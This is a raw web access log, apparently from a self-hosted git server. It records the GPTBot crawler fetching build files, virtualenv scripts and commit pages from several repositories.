"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:42:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 10000] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:14:42:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:14:42:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10002] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:14:42:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9989] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:14:42:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11065] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:14:42:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4766] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:14:42:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 14077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:14:42:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 14077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:14:42:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:14:42:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:14:42:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10064] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:14:42:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 18934] [Gzip 14.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:14:42:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 11404] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build" -[17/Feb/2026:14:42:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 335] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:14:42:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 9921] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:14:42:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 10769] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:14:42:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:14:42:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:14:42:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build" [Client 74.7.227.38] [Length 9917] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build" -[17/Feb/2026:14:42:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build" [Client 74.7.227.38] [Length 9918] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build" -[17/Feb/2026:14:42:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 10769] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:14:42:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 9921] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:14:42:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 187] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/pyvenv.cfg" -[17/Feb/2026:14:42:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 335] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:14:42:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 1541] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" -[17/Feb/2026:14:43:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 51955] [Gzip 9.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83" -[17/Feb/2026:14:43:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 239338] [Gzip 15.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?show-outdated=&style=unified&whitespace=ignore-change" -[17/Feb/2026:14:43:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 387780] [Gzip 16.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0" -[17/Feb/2026:14:43:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 212460] [Gzip 13.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8" -[17/Feb/2026:14:43:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 16190] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584?show-outdated=&style=unified&whitespace=ignore-change" -[17/Feb/2026:14:43:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 57175] [Gzip 11.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83?show-outdated=&style=unified&whitespace=ignore-change" -[17/Feb/2026:14:43:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 387764] [Gzip 16.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0" -[17/Feb/2026:14:43:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 16185] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584" -[17/Feb/2026:14:43:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 9922] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/.vscode" -[17/Feb/2026:14:43:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10404] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp" -[17/Feb/2026:14:43:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 12964] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin" -[17/Feb/2026:14:43:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 12996] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin" -[17/Feb/2026:14:43:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 9947] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python" -[17/Feb/2026:14:43:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:14:43:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 9892] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/services/geminiService.ts" -[17/Feb/2026:14:43:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/package.json" [Client 74.7.227.38] [Length 11704] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html" -[17/Feb/2026:14:43:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" [Client 74.7.227.38] [Length 16958] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot" -[17/Feb/2026:14:43:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" [Client 74.7.227.38] [Length 16925] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot" -[17/Feb/2026:14:43:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a?files=html%2fpages" [Client 74.7.227.38] [Length 30629] [Gzip 8.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages" -[17/Feb/2026:14:43:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/types.ts?display=source" [Client 74.7.227.38] [Length 11496] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/types.ts" -[17/Feb/2026:14:43:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10866] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/.gitignore" -[17/Feb/2026:14:43:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 12745] [Gzip 6.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate" -[17/Feb/2026:14:43:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 12776] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate" -[17/Feb/2026:14:43:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate" -[17/Feb/2026:14:43:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 9907] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate" -[17/Feb/2026:14:43:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 2086] 